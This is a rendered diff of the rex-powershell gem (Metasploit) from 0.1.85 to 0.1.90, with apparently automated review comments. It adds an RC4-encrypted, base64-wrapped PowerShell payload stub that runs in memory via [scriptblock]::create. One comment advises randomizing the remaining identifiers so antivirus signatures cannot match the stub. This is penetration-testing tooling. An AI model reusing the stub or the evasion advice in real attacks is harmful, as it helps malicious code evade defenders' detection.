rex-powershell 0.1.85 → 0.1.90
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/.travis.yml +1 -1
- data/data/templates/to_mem_rc4.ps1.template +40 -0
- data/lib/rex/powershell/command.rb +8 -1
- data/lib/rex/powershell/payload.rb +22 -0
- data/lib/rex/powershell/version.rb +1 -1
- data/rex-powershell.gemspec +5 -5
- metadata +39 -38
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 0a33516521ac7e860fca2bc66ae38f9859cac0588b657c8ffbe2e5ce8120adde
|
4
|
+
data.tar.gz: 222e5ad9199ac80d8c8ec1b88d9504550f89b8811bc36dfc5df9bd34f3c7f329
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 2d048a4d9875adff24b0a7168813918bfa36914130fb41df3666242f2553571b9afe0befac3daa3117f557f0881289e0ec21ceefe2b11922315747a73b6613ff
|
7
|
+
data.tar.gz: df1b2109a3ffb337e5691f1a517ee08a99cb335c7b916c820a62e8caef91437a4c6815ad02bb7910daebb05a010acd51c79cc7ce101c7ab617577b9d4d1165ac
|
checksums.yaml.gz.sig
CHANGED
Binary file
|
data.tar.gz.sig
CHANGED
Binary file
|
data/.travis.yml
CHANGED
@@ -0,0 +1,40 @@
|
|
1
|
+
function %{func_rc4_decrypt} {
|
2
|
+
param([Byte[]]$%{var_rc4buffer})
|
3
|
+
|
4
|
+
$%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
|
5
|
+
|
6
|
+
$s = New-Object Byte[] 256;
|
7
|
+
$k = New-Object Byte[] 256;
|
8
|
+
|
9
|
+
for ($i = 0; $i -lt 256; $i++)
|
10
|
+
{
|
11
|
+
$s[$i] = [Byte]$i;
|
12
|
+
$k[$i] = $%{var_key}[$i %% $%{var_key}.Length];
|
13
|
+
}
|
14
|
+
|
15
|
+
$j = 0;
|
16
|
+
for ($i = 0; $i -lt 256; $i++)
|
17
|
+
{
|
18
|
+
$j = ($j + $s[$i] + $k[$i]) %% 256;
|
19
|
+
$temp = $s[$i];
|
20
|
+
$s[$i] = $s[$j];
|
21
|
+
$s[$j] = $temp;
|
22
|
+
}
|
23
|
+
|
24
|
+
$i = $j = 0;
|
25
|
+
for ($x = 0; $x -lt $%{var_rc4buffer}.Length; $x++)
|
26
|
+
{
|
27
|
+
$i = ($i + 1) %% 256;
|
28
|
+
$j = ($j + $s[$i]) %% 256;
|
29
|
+
$temp = $s[$i];
|
30
|
+
$s[$i] = $s[$j];
|
31
|
+
$s[$j] = $temp;
|
32
|
+
[int]$t = ($s[$i] + $s[$j]) %% 256;
|
33
|
+
$%{var_rc4buffer}[$x] = $%{var_rc4buffer}[$x] -bxor $s[$t];
|
34
|
+
}
|
35
|
+
|
36
|
+
$%{var_rc4buffer}
|
37
|
+
}
|
38
|
+
|
39
|
+
&([scriptblock]::create(([system.Text.Encoding]::UTF8).GetString((%{func_rc4_decrypt} ([System.Convert]::FromBase64String("%{b64payload}"))))))
|
40
|
+
|
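Review bot: Only `%{func_rc4_decrypt}`, `%{var_rc4buffer}` and `%{var_key}` are randomized; the S-box, key-schedule and counter names (`$s`, `$k`, `$i`, `$j`, `$temp`, `$t`, `$x`) are fixed, so the KSA/PRGA stub (`New-Object Byte[] 256`, `%% 256`, `-bxor`, `[scriptblock]::create`) emits the same token sequence in every generated script and is trivially signaturable, which undercuts the point of wrapping the payload at all. Consider routing the remaining names through the identifier generator too, e.g. `$%{var_sbox} = New-Object Byte[] 256;` with a matching `rig.init_var(:var_sbox)` on the Ruby side. Keep explanatory comments out of this file, since every template line lands verbatim in the emitted payload; document the design in payload.rb instead. The rendering labels this hunk `data/.travis.yml`, but the diffstat's 40-line addition belongs to `to_mem_rc4.ps1.template`, which this content presumably is.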
@@ -123,6 +123,8 @@ module Command
|
|
123
123
|
# powershell profile (-NoProfile)
|
124
124
|
# @option opts [String] :windowstyle The window style to use
|
125
125
|
# (-WindowStyle)
|
126
|
+
# @option opts [String] :version The version of Powershell to run
|
127
|
+
# (-version)
|
126
128
|
#
|
127
129
|
# @return [String] Powershell command arguments
|
128
130
|
def self.generate_psh_args(opts)
|
@@ -157,6 +159,8 @@ module Command
|
|
157
159
|
arg_string << '-NoProfile ' if value
|
158
160
|
when :windowstyle
|
159
161
|
arg_string << "-WindowStyle #{value} " if value
|
162
|
+
when :version
|
163
|
+
arg_string << "-Version #{value} " if value
|
160
164
|
end
|
161
165
|
end
|
162
166
|
|
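Review bot: `value` is interpolated straight into the argument string at `arg_string << "-Version #{value} " if value` with no validation, and that string is presumably embedded in a command line later, so a value containing spaces or extra switches changes the argument structure instead of failing. This mirrors the existing `:windowstyle` branch, but `-Version` only ever takes a dotted number, so it is cheap to reject anything else up front: `fail ArgumentError, "invalid powershell version: #{value.inspect}" if value && value.to_s !~ /\A\d+(\.\d+)?\z/` before the append. generate_psh_args begins and ends outside this hunk.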
@@ -188,6 +192,7 @@ module Command
|
|
188
192
|
arg_string.gsub!('-OutputFormat ', '-o ')
|
189
193
|
arg_string.gsub!('-Sta ', '-s ')
|
190
194
|
arg_string.gsub!('-WindowStyle ', '-w ')
|
195
|
+
arg_string.gsub!('-Version ', '-v ')
|
191
196
|
end
|
192
197
|
|
193
198
|
# Strip off first space character
|
@@ -301,7 +306,9 @@ EOS
|
|
301
306
|
else
|
302
307
|
fail RuntimeError, 'No Powershell method specified'
|
303
308
|
end
|
304
|
-
|
309
|
+
if opts[:exec_rc4]
|
310
|
+
psh_payload = Rex::Powershell::Payload.to_win32pe_psh_rc4(template_path, psh_payload)
|
311
|
+
end
|
305
312
|
# Run our payload in a while loop
|
306
313
|
if opts[:persist]
|
307
314
|
fun_name = Rex::Text.rand_text_alpha(rand(2) + 2)
|
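Review bot: The new `opts[:exec_rc4]` branch is not documented where the method's other options are described (the YARD block is outside this hunk, so confirm), and nothing tells callers that the RC4 key is embedded in the emitted script. Add `# @option opts [Boolean] :exec_rc4 Wrap the payload in a self-decrypting RC4 stub (key ships inside the script: static-signature evasion only, not confidentiality)`. Note also that the wrapper inflates the payload (RC4 output base64-encoded plus the ~40-line stub) before the `:persist` loop and any later encoding are applied, so command-line length limits are reached sooner; that deserves a sentence in the same doc. The enclosing method starts and ends outside the hunk.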
@@ -1,5 +1,6 @@
|
|
1
1
|
# -*- coding: binary -*-
|
2
2
|
require 'rex/random_identifier'
|
3
|
+
require 'rc4'
|
3
4
|
|
4
5
|
module Rex
|
5
6
|
module Powershell
|
@@ -106,6 +107,27 @@ module Payload
|
|
106
107
|
read_replace_script_template(template_path, "to_mem_msil.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
107
108
|
end
|
108
109
|
|
110
|
+
#
|
111
|
+
# PSH script that executes an RC4 encrypted payload with Invoke-Expression
|
112
|
+
# by Adrian Vollmer (SySS GmbH, https://www.syss.de)
|
113
|
+
#
|
114
|
+
def self.to_win32pe_psh_rc4(template_path = TEMPLATE_DIR, code)
|
115
|
+
rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
|
116
|
+
rig.init_var(:func_rc4_decrypt)
|
117
|
+
rig.init_var(:var_rc4buffer)
|
118
|
+
rig.init_var(:var_key)
|
119
|
+
|
120
|
+
key = Rex::Text.rand_text_alpha(rand(8)+8)
|
121
|
+
rc4 = RC4.new(key)
|
122
|
+
enc_code = rc4.encrypt(code)
|
123
|
+
|
124
|
+
hash_sub = rig.to_h
|
125
|
+
hash_sub[:random_key] = key
|
126
|
+
hash_sub[:b64payload] = Rex::Text.encode_base64(enc_code)
|
127
|
+
|
128
|
+
read_replace_script_template(template_path, "to_mem_rc4.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
129
|
+
end
|
130
|
+
|
109
131
|
end
|
110
132
|
end
|
111
133
|
end
|
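Review bot: The header comment says the payload is executed "with Invoke-Expression", but the template this method fills (`to_mem_rc4.ps1.template`, visible earlier in this diff) runs it via `&([scriptblock]::create(...))`, so the comment is wrong on the one detail a maintainer or defender would search for. It also omits the important caveat: `hash_sub[:random_key] = key` places the RC4 key in the generated script next to the ciphertext, so this is obfuscation against static matching, not encryption, which is also why `Rex::Text.rand_text_alpha(rand(8)+8)` with Kernel#rand is acceptable here and does not need SecureRandom. Rewrite the comment to name the execution primitive, state the embedded-key caveat, and note that the alpha-only key presumably keeps the `%`-style template substitution (hence the `%%` escapes in the template) safe from stray `%` characters; the caveat line could read `# The key is embedded in the emitted script: this evades static signatures, it does not protect the payload.`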
data/rex-powershell.gemspec
CHANGED
@@ -6,8 +6,8 @@ require 'rex/powershell/version'
|
|
6
6
|
Gem::Specification.new do |spec|
|
7
7
|
spec.name = "rex-powershell"
|
8
8
|
spec.version = Rex::Powershell::VERSION
|
9
|
-
spec.authors = [
|
10
|
-
spec.email = [
|
9
|
+
spec.authors = ['Metasploit Hackers']
|
10
|
+
spec.email = ['msfdev@metasploit.com']
|
11
11
|
|
12
12
|
spec.summary = %q{Rex Powershell Utilities}
|
13
13
|
spec.description = %q{Ruby Exploitation(Rex) library for generating/manipulating Powershell scripts}
|
@@ -20,10 +20,10 @@ Gem::Specification.new do |spec|
|
|
20
20
|
|
21
21
|
spec.required_ruby_version = '>= 2.2.0'
|
22
22
|
|
23
|
-
spec.add_development_dependency "
|
24
|
-
spec.add_development_dependency "
|
25
|
-
spec.add_development_dependency "rspec", "~> 3.0"
|
23
|
+
spec.add_development_dependency "rake"
|
24
|
+
spec.add_development_dependency "rspec"
|
26
25
|
|
27
26
|
spec.add_runtime_dependency 'rex-text'
|
28
27
|
spec.add_runtime_dependency 'rex-random_identifier'
|
28
|
+
spec.add_runtime_dependency 'ruby-rc4'
|
29
29
|
end
|
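Review bot: `spec.add_runtime_dependency 'ruby-rc4'` adds a new third-party gem as a hard runtime dependency with no version constraint, and the same hunk drops the `~> 3.0` bound rspec previously had, so every consumer resolves whatever the latest published versions are at install time. For a library loaded into Metasploit that is a supply-chain exposure worth bounding: pin to the tested minor, e.g. `spec.add_runtime_dependency 'ruby-rc4', '~> 0.1'` (adjust to whatever was actually tested), or implement RC4 locally, since the whole cipher is a few dozen lines and the PowerShell template in this same release already carries its own implementation. The metadata section shows the gem itself is signed, which covers this gem but not what `ruby-rc4` pulls in.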
metadata
CHANGED
@@ -1,10 +1,10 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: rex-powershell
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.1.
|
4
|
+
version: 0.1.90
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
|
-
-
|
7
|
+
- Metasploit Hackers
|
8
8
|
autorequire:
|
9
9
|
bindir: exe
|
10
10
|
cert_chain:
|
@@ -64,20 +64,20 @@ cert_chain:
|
|
64
64
|
-----END CERTIFICATE-----
|
65
65
|
- |
|
66
66
|
-----BEGIN CERTIFICATE-----
|
67
|
-
|
67
|
+
MIIFIzCCBAugAwIBAgIQCMePMbkSxvnPeJhYXIfaxzANBgkqhkiG9w0BAQsFADBy
|
68
68
|
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
69
69
|
d3cuZGlnaWNlcnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQg
|
70
|
-
|
70
|
+
SUQgQ29kZSBTaWduaW5nIENBMB4XDTIwMTAwNzAwMDAwMFoXDTIzMTEwNjEyMDAw
|
71
71
|
MFowYDELMAkGA1UEBhMCVVMxFjAUBgNVBAgTDU1hc3NhY2h1c2V0dHMxDzANBgNV
|
72
72
|
BAcTBkJvc3RvbjETMBEGA1UEChMKUmFwaWQ3IExMQzETMBEGA1UEAxMKUmFwaWQ3
|
73
|
-
|
74
|
-
|
75
|
-
|
76
|
-
|
77
|
-
|
78
|
-
|
79
|
-
|
80
|
-
|
73
|
+
IExMQzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALNTz4zvAy7h/vQp
|
74
|
+
4dr1txXHlABAagkwYYwTMCtHs5PXsJITx/5SAjx5swuaLfze5kPBNF2YImvFlOXY
|
75
|
+
WaB+0PsOnXnaARsDZU683xFlj8izU6IN6VrAHzDLKFBzruJENrOJD/ikbEtbjO/q
|
76
|
+
gFbmS9J9v5ohG/pcRSS0t4ZPAwymf8eCp6QsvOKK/Aymp1RhlRaP8N6N5CIpkhz1
|
77
|
+
9p968iCE+DjOXVYxcWE+jE/7uB1dbgrXykNBujMSS3GULOvVEY28n6NCmrPlo23g
|
78
|
+
yRjYVJ2Vy14nBqnxDZ/yRIfWRVjWoT9TsAEbe9gY29oDpSCSs4wSmLQd5zGCpZ9h
|
79
|
+
r0HDFB8CAwEAAaOCAcUwggHBMB8GA1UdIwQYMBaAFFrEuXsqCqOl6nEDwGD5LfZl
|
80
|
+
dQ5YMB0GA1UdDgQWBBTLBL7DTwumVEKtdCdpHVYMXOFeDzAOBgNVHQ8BAf8EBAMC
|
81
81
|
B4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwdwYDVR0fBHAwbjA1oDOgMYYvaHR0cDov
|
82
82
|
L2NybDMuZGlnaWNlcnQuY29tL3NoYTItYXNzdXJlZC1jcy1nMS5jcmwwNaAzoDGG
|
83
83
|
L2h0dHA6Ly9jcmw0LmRpZ2ljZXJ0LmNvbS9zaGEyLWFzc3VyZWQtY3MtZzEuY3Js
|
@@ -86,59 +86,59 @@ cert_chain:
|
|
86
86
|
JAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBOBggrBgEFBQcw
|
87
87
|
AoZCaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0U0hBMkFzc3Vy
|
88
88
|
ZWRJRENvZGVTaWduaW5nQ0EuY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQEL
|
89
|
-
|
90
|
-
|
91
|
-
|
92
|
-
|
93
|
-
|
94
|
-
|
89
|
+
BQADggEBAN+GL5/myPWg7oH4mVrG7/OhXF1MoYQF0ddaNiqaweEHMuKJBQCVZRbL
|
90
|
+
37HojoKXXv2yyRJBCeTB+ojrxX+5PdLVZa0ss7toWzJ2A1poPXZ1eZvm5xeFD32z
|
91
|
+
YQaTmmNWNI3PCDTyJ2PXUc+bDiNNwcZ7yc5o78UNRvp9Jxghya17Q76c9Ov9wvnv
|
92
|
+
dxxQKWGOQy0m4fBrkyjAyH9Djjn81RbQrqYgPuhd5nD0HjN3VUQLhQbIJrk9TVs0
|
93
|
+
EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
|
94
|
+
9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
|
95
95
|
-----END CERTIFICATE-----
|
96
|
-
date:
|
96
|
+
date: 2021-04-23 00:00:00.000000000 Z
|
97
97
|
dependencies:
|
98
98
|
- !ruby/object:Gem::Dependency
|
99
|
-
name:
|
99
|
+
name: rake
|
100
100
|
requirement: !ruby/object:Gem::Requirement
|
101
101
|
requirements:
|
102
|
-
- - "
|
102
|
+
- - ">="
|
103
103
|
- !ruby/object:Gem::Version
|
104
|
-
version: '
|
104
|
+
version: '0'
|
105
105
|
type: :development
|
106
106
|
prerelease: false
|
107
107
|
version_requirements: !ruby/object:Gem::Requirement
|
108
108
|
requirements:
|
109
|
-
- - "
|
109
|
+
- - ">="
|
110
110
|
- !ruby/object:Gem::Version
|
111
|
-
version: '
|
111
|
+
version: '0'
|
112
112
|
- !ruby/object:Gem::Dependency
|
113
|
-
name:
|
113
|
+
name: rspec
|
114
114
|
requirement: !ruby/object:Gem::Requirement
|
115
115
|
requirements:
|
116
|
-
- - "
|
116
|
+
- - ">="
|
117
117
|
- !ruby/object:Gem::Version
|
118
|
-
version: '
|
118
|
+
version: '0'
|
119
119
|
type: :development
|
120
120
|
prerelease: false
|
121
121
|
version_requirements: !ruby/object:Gem::Requirement
|
122
122
|
requirements:
|
123
|
-
- - "
|
123
|
+
- - ">="
|
124
124
|
- !ruby/object:Gem::Version
|
125
|
-
version: '
|
125
|
+
version: '0'
|
126
126
|
- !ruby/object:Gem::Dependency
|
127
|
-
name:
|
127
|
+
name: rex-text
|
128
128
|
requirement: !ruby/object:Gem::Requirement
|
129
129
|
requirements:
|
130
|
-
- - "
|
130
|
+
- - ">="
|
131
131
|
- !ruby/object:Gem::Version
|
132
|
-
version: '
|
133
|
-
type: :
|
132
|
+
version: '0'
|
133
|
+
type: :runtime
|
134
134
|
prerelease: false
|
135
135
|
version_requirements: !ruby/object:Gem::Requirement
|
136
136
|
requirements:
|
137
|
-
- - "
|
137
|
+
- - ">="
|
138
138
|
- !ruby/object:Gem::Version
|
139
|
-
version: '
|
139
|
+
version: '0'
|
140
140
|
- !ruby/object:Gem::Dependency
|
141
|
-
name: rex-
|
141
|
+
name: rex-random_identifier
|
142
142
|
requirement: !ruby/object:Gem::Requirement
|
143
143
|
requirements:
|
144
144
|
- - ">="
|
@@ -152,7 +152,7 @@ dependencies:
|
|
152
152
|
- !ruby/object:Gem::Version
|
153
153
|
version: '0'
|
154
154
|
- !ruby/object:Gem::Dependency
|
155
|
-
name:
|
155
|
+
name: ruby-rc4
|
156
156
|
requirement: !ruby/object:Gem::Requirement
|
157
157
|
requirements:
|
158
158
|
- - ">="
|
@@ -168,7 +168,7 @@ dependencies:
|
|
168
168
|
description: Ruby Exploitation(Rex) library for generating/manipulating Powershell
|
169
169
|
scripts
|
170
170
|
email:
|
171
|
-
-
|
171
|
+
- msfdev@metasploit.com
|
172
172
|
executables: []
|
173
173
|
extensions: []
|
174
174
|
extra_rdoc_files: []
|
@@ -185,6 +185,7 @@ files:
|
|
185
185
|
- data/templates/to_mem_msil.ps1.template
|
186
186
|
- data/templates/to_mem_old.ps1.template
|
187
187
|
- data/templates/to_mem_pshreflection.ps1.template
|
188
|
+
- data/templates/to_mem_rc4.ps1.template
|
188
189
|
- lib/rex/powershell.rb
|
189
190
|
- lib/rex/powershell/command.rb
|
190
191
|
- lib/rex/powershell/function.rb
|
metadata.gz.sig
CHANGED
Binary file
|